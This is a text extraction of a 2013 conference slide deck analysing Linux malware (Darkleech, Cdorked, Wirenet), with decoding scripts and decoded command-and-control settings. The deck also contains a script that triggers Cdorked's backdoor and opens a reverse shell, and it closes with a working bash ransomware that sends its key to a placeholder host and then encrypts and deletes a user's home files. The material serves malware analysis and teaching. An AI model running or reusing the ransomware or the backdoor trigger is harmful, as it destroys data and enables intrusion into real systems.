malwaremoutane.net/rmll2013/day_1/linux_malware.pdf · linux malware presentation @r00tbsd – paul...
TRANSCRIPT
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Malware.lu
July 2013
@r00tbsd – Paul Rascagnères
Linux malware presentation
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
- Conclusion
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Presentation
Who am I? Paul Rascangères - @r00tbsd or @malware.lu. Creator and maintener of malware.lu. Malware analysis, Incident Response, Reverse Engineering... Author of “Malware – Identification, analyse et éradication”
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Presentation
Why am I here and why this talk?Some people think that malware don't exist onLinux platform.
4 examples in 2012/2013: - Darkleech (Apache module) - Cdorked (Apache server) - wirenet (Remote Administration Tool) - gift...
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
- Conclusion
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
First seen The first version was identify in August 2012.
How does it work? This malware is an apache module. The module is executed by LoadModule command and defines in the module configuration file.
Features: - inject JavaScript code to redirect users on infected Website - backdoor
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis - module Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so Example: mod_sec2_config.so Module execution: cat /etc/apache2/modules/[VARIOUS].conf LoadModule sec2_config_module modules/mod_sec2_config.so Analysis - Symptoms The malware injects Exploit Kits (JS) on the Web pages:
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis - Symptoms
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis – Symptoms The redirection is performed by a JavaScript insertion (IFrame):
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis – Targets selection The targets selection is performed thanks to the REFERER. C_ARRAY_BAN_USERAGENT:SAFARI YANDEXOPERA CRAWLERFIREFOX JIKECHROME SPIDERGOOGLEBOT ROBOTSLURP PAPERLIBOTYAHOO SNAPPREVIEWBOTBING BUFFERBOTLINUX MEDIAPARTNERSOPENBSD HATENAMACINTOSH BLUEDRAGONMAC OS WORDPRESSIPHONE XIANGUO...
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis – Reversing The data are encoded in the file:
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis – Reversing Several function (symbols) are linked to the encoding: - 0x17C8 xor_decrypt_string - 0x17ED xor_encrypt_string - 0x1800 xor_encrypt
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis – Reversing xor_decrypt_string pseudo-Cxor_decrypt_string(A8, Ac, A10, A14){ L00003117(); ebx = ebx + 0x5001; esp = esp - 0xc; Vfffffff4 = A14 + 1; *esp = *( *( *( *(ebx + -300)) + 0xc)); *(ebp - 0x10) = L00002D90(); if(A14 > 0) { ecx = 0; do { edx = 0; eax = 0; edx = 0 >> 0x1f; Ac = Ac / Ac; al = *A10 & 0xff ^ *(Ac % Ac + A8); *( *(ebp - 0x10)) = al; } while(1 != A14); } esi = *(ebp - 0x10); *(esi + A14) = 0; eax = esi; esp = esp + 0xc;}
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis – Reversing xor_decrypt_string python implementation:
fd.seek(0x84a0)key = fd.read(23)
for s in tab: fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key))) clear_text = decrypted.split('\x00')[0] print('%s: %s') % (s['name'], clear_text)
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Darkleech/Chapro
Analysis – Reversing$ python sec2.py "./mod_sec2_config.so"C_MODULE_VERSION: "2012.12.14"C_CC_HOST: "217.23.13.6"C_CC_URI: "/Home/index.php"C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1"Host: "%s"Content-Type: "application/x-www-form-urlencoded"Content-Length:" %i %s"C_MARKER_LEFT: "{{{"C_MARKER_RIGHT: "}}}"C_TMP_DIR: "/"C_LIST_PREF: "sess_"C_COOKIE_NAME: "PHP_SESSION_ID="C_ARRAY_TAGS_FOR_INJECT: " < /script> < /style> < /head> < /title>...
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
- Conclusion
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Cdorked
Presentation Unliked it brother Darkleech/Chapro, Cdorked is not an Apache module but a custom apache server. The malware used a XOR to encrypt strings:
fd.seek(0x16B460) # XOR keykey = fd.read(24)
for i, s in enumerate(tab): fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key))) print('xx%s: %s') % (i, decrypted)
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Cdorked
How to get a shell ? - request
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Cdorked
How to get a shell ? - encryption
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Cdorked
How to get a shell ? - encryption
Here is the code:
ip = $client_ip key[0] = ( (ip AND 0xFF000000) >> 24 ) + 5 key[1] = ( (ip AND 0xFF0000 ) >> 16 ) + 33 key[2] = ( (ip AND 0xFF00 ) >> 8 ) + 55 key[3] = ( (ip ) ) + 78
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Cdorked
How to get a shell ? - the reverse-shell
import urllib2import subprocessimport os
LHOST = '192.168.56.1'LPORT = '4444'
RHOST = '192.168.56.101'RPORT = '80'
param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex')request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param)
if os.fork(): req = urllib2.Request(request) req.add_header('X-Real-IP', '251.223.201.178') urllib2.urlopen(req)else: subprocess.call(['nc', '-l', LPORT])
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
- Conclusion
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Wirenet
Strings obfuscation The attacker used RC4 algorithm to encrypt configuration:
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Wirenet
Strings obfuscation
fp = open(sys.argv[1]) fp.seek(0xf4d8, 0) key = fp.read(16)for c in crypted: rc4 = ARC4.new(key) fp.seek(c['adr']) data = fp.read(c['len']) val = rc4.decrypt(data).split('\x00')[0] print "%s: %s" % (c['name'], val)
if c['name'] == 'BoolSettingsByte': for name, o in options.iteritems(): print "%s: %s" % (name, isOption(val, o))
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Wirenet
Strings obfuscation
y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56eConnectionString: 212.7.208.65:4141;ProxyString: -Password: sm0k4s523syst3m523HostId: LINUXMutexName: vJEewiWDInstallPath: %home%/WIFIADAPTStartupKeyName1: WIFIADAPTERStartupKeyName2: -KeyLoggerFileName: %Home%\.m8d.datBoolSettingsByte: 237run_as_daemon: Truexinit_start: Falseinstall_file: Truelock_file?: Truekeylogger: Truesingle_instance: Truedesktop_start: TrueConnectionType: 001
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Wirenet
Fake C&C
wirenet $ New session 127.0.0.1:52956wirenet $ session0 127.0.0.1:52956 LINUX rootbsd @ alienwirenet $ session 0Switch to session 0 context127.0.0.1:52956 $ help
Undocumented commands:======================EOF cred_thunderbird get log_clear mkdir rm shellcp creds help log_get mv screen cred_pidgin exit info ls ps session
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Wirenet
Fake C&C
127.0.0.1:52956 $ infoarch: LINUXname: rootbsd @ alienDISTRIB_ID=UbuntuDISTRIB_RELEASE=12.04DISTRIB_CODENAME=preciseDISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"127.0.0.1:52956 $ shellShell is start with /bin/sh (EOF to exit)iduid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1001(bumblebee)
Shell is stop
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Wirenet
Fake C&C
wirenet $ New session 127.0.0.1:52956wirenet $ session0 127.0.0.1:52956 LINUX rootbsd @ alienwirenet $ session 0Switch to session 0 context127.0.0.1:52956 $ help
Undocumented commands:======================EOF cred_thunderbird get log_clear mkdir rm shellcp creds help log_get mv screen cred_pidgin exit info ls ps session
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
- Conclusion
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Gift
Linux is so powerfull... (ransomware for free)
#!/bin/bashpasswd=$(openssl rand -hex 64)curl http://www.c-and-c.com/test?$passwdlist=$(find $HOME -type f)for i in $(echo $list)do openssl aes-256-ecb -in $i -out $i.new -pass pass:$passwd rm $idone
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Conclusion